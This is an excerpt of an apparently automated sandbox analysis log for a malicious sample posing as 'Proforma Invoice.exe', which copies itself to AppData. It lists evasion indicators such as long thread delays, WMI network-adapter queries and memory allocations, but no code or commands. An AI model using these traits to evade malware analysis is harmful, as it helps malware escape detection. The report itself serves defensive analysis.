                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 6412, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: VoAlKljQu.exe PID: 7492, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory allocated: B40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory allocated: 2590000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory allocated: 72C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory allocated: 82C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory allocated: 8470000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory allocated: 9470000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory allocated: 1380000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeMemory allocated: 2DC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeMemory allocated: 1020000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeMemory allocated: 4B40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeMemory allocated: 7590000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeMemory allocated: 8590000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeMemory allocated: 8730000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeMemory allocated: 9730000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeMemory allocated: 1030000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeMemory allocated: 2BC0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeMemory allocated: 2950000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199971Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199844Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199734Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199625Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199515Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199406Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199297Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199187Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1199078Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198969Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198859Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198750Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198639Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198531Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198422Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198312Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198203Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeThread delayed: delay time: 1198094Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1200000
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199879
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199754
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199629
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199504
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199379
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199254
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199129
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1199004
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198879
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198754
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198629
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198504
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198379
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198254
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198129
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1198004
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeThread delayed: delay time: 1197879
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2962Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4430Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeWindow / User API: threadDelayed 4439Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeWindow / User API: threadDelayed 5362Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeWindow / User API: threadDelayed 7716
                        Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exeWindow / User API: threadDelayed 2119
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 6616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep count: 2962 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7212Thread sleep count: 81 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7644Thread sleep count: 4439 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -99875s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7644Thread sleep count: 5362 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -99750s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -99640s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -99531s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -99421s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -99310s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -99160s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -99032s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -98907s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -98763s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -98657s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -98532s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -98406s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -98297s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -98188s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -98063s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -97938s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -97823s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -97703s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -97594s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -97485s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -97375s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -97266s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -97141s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -97016s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -96907s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632Thread sleep time: -96776s >= -30000sJump to behavior
